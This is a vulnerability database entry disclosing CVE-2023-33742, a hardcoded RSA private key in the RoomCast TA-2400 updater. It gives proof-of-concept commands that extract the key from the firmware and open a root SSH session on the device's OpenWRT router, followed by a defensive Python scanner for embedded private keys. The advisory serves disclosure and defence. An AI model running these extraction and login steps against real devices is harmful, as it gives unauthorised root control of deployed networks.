| Title | RoomCast TA-2400 - CVE-2023-33742 - Cleartext Storage of Sensitive Information in Executable |
|---|
| Description |
CVE-2023-33742: CLEARTEXT STORAGE OF SENSITIVE INFORMATION IN EXECUTABLE in UPDATE.EXE in TELEADAPT ROOMCAST TA-2400 1.0.0 AND LATER allows REMOTE ATTACKERS to GET ROOT SHELL via SSH AUTHENTICATION
Vulnerability Type: CWE-318: Cleartext Storage of Sensitive Information in Executable
Vulnerability Description: The Update.exe file exposes the RSA private key used for authentication with the OpenWRT node. This unencrypted RSA private key can be extracted from the Update.exe file, enabling an unauthorised individual to establish a root-level SSH connection with the OpenWRT node.
Device: RoomCast TA-2400
Software: Update.exe
RoomCast Component: OpenWRT Router
CVSS Base Score: Critical Risk - 9.6
CVSS Temporal Score: Critical Risk - 9.1
CVSS v3.1 Vector: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:W/RC:C
Proof of Concept
In this section, we present a detailed proof of concept (PoC) to illustrate the identified vulnerability within the RoomCast TA-2400 device. The PoC provides step-by-step instructions for identifying the vulnerability and successfully exploiting it. For testing the PoC, we recommend a Linux-based environment, which offers the necessary tools and compatibility for conducting the tests accurately and reliably.
1. Download the latest OpenWRT firmware package from the RoomCast support page.
Support Portal: https://rc.teleadapt.com
Download: https://rc.teleadapt.com/roomcast/production/releases/r3.00/router_firmware_170622.zip
2. Open the firmware archive that was previously downloaded and locate the update.exe file.
3. Extract the RSA private key from the update.exe executable and save it to a local private key file. Navigate to the location of the update.exe file from steps 1 and 2 and run the following command.
Command: strings update.exe | sed -n "$(strings update.exe | grep -n -e "BEGIN RSA PRIVATE KEY" | cut -d : -f 1), $(strings update.exe | grep -n -e "END RSA PRIVATE KEY" | cut -d : -f 1)p" | sed "s/--t/--/g" > rsa_key.pem
4. Change the permissions of the newly saved rsa_key.pem file so it can work with the ssh command.
Command: sudo chmod 400 rsa_key.pem
5. Establish an SSH connection with the OpenWRT node. Run the following command while being in the same directory as the created rsa_key.pem file.
Command: sudo ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -o PubkeyAcceptedKeyTypes=ssh-rsa -i rsa_key.pem [email protected]
If this is your first time connecting to the OpenWRT node, you will need to confirm it as a verified host. You should now have a terminal session on the OpenWRT node as the root user. This is a complete compromise of the OpenWRT node, providing unrestricted control over its operations and configurations.
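A release-side check for the weakness described above (CWE-318), added here as an example and not part of the original submission or the vendor's tooling: it reports where PEM private-key headers sit inside a build artifact such as an updater executable, in ASCII or UTF-16LE form, without printing key material. The function names and the sample bytes are constructed for illustration.

```python
import re
import sys

# Header of any PEM private key: RSA, EC, DSA, OPENSSH, PKCS#8 (plain or encrypted).
BEGIN = re.compile(rb"-----BEGIN ((?:[A-Z0-9]+ )*PRIVATE KEY)-----")

def find_embedded_private_keys(data: bytes):
    """Return sorted (offset, encoding, label, cleartext) tuples, one per PEM header.

    Key material is never returned or printed, only where it sits in the file.
    """
    # View 1 is the raw bytes. Views 2 and 3 keep every second byte so that
    # UTF-16LE wide strings (common in Windows executables) read as ASCII,
    # whether they start on an even or an odd offset.
    views = [("ascii", data, 1, 0),
             ("utf-16le", data[0::2], 2, 0),
             ("utf-16le", data[1::2], 2, 1)]
    findings = []
    for encoding, view, stride, base in views:
        for m in BEGIN.finditer(view):
            offset = base + m.start() * stride
            # A real wide string has a NUL byte after every character.
            if stride == 2 and any(data[offset + 1:offset + 2 * len(m.group(0)):2]):
                continue
            end = view.find(b"-----END " + m.group(1) + b"-----", m.end())
            body = view[m.end():end if end != -1 else m.end() + 4096]
            encrypted = (m.group(1).startswith(b"ENCRYPTED")
                         or b"Proc-Type: 4,ENCRYPTED" in body)
            findings.append((offset, encoding, m.group(1).decode(), not encrypted))
    return sorted(findings)

# Constructed sample: filler bytes around placeholder PEM blocks (no real key).
PLACEHOLDER_PEM = (b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER+NOT+A+KEY\n"
                   b"-----END RSA PRIVATE KEY-----\n")
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 60 + PLACEHOLDER_PEM + b"\xff" * 7
          + PLACEHOLDER_PEM.decode().encode("utf-16-le") + b"\x01\x02")

def main(paths):
    hits = 0
    for path in paths:
        with open(path, "rb") as fh:
            for offset, enc, label, cleartext in find_embedded_private_keys(fh.read()):
                state = "cleartext" if cleartext else "encrypted"
                print(f"{path}: {label} ({state}, {enc}) at offset 0x{offset:x}")
                hits += 1
    return 1 if hits else 0  # non-zero exit fails a release pipeline step

if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it over every file in a release archive before publishing; any cleartext hit means the shipped artifact carries a credential that every downloader can read.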
|
|---|
| Source | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33742 |
|---|
| User | jTag Labs (UID 51246) |
|---|
| Submission | 21/07/2023 03:04 (3 years ago) |
|---|
| Moderation | 28/07/2023 07:09 (7 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 235618 [TeleAdapt RoomCast TA-2400 up to 3.1 RSA Private Key Update.exe information disclosure] |
|---|
| Points | 20 |
|---|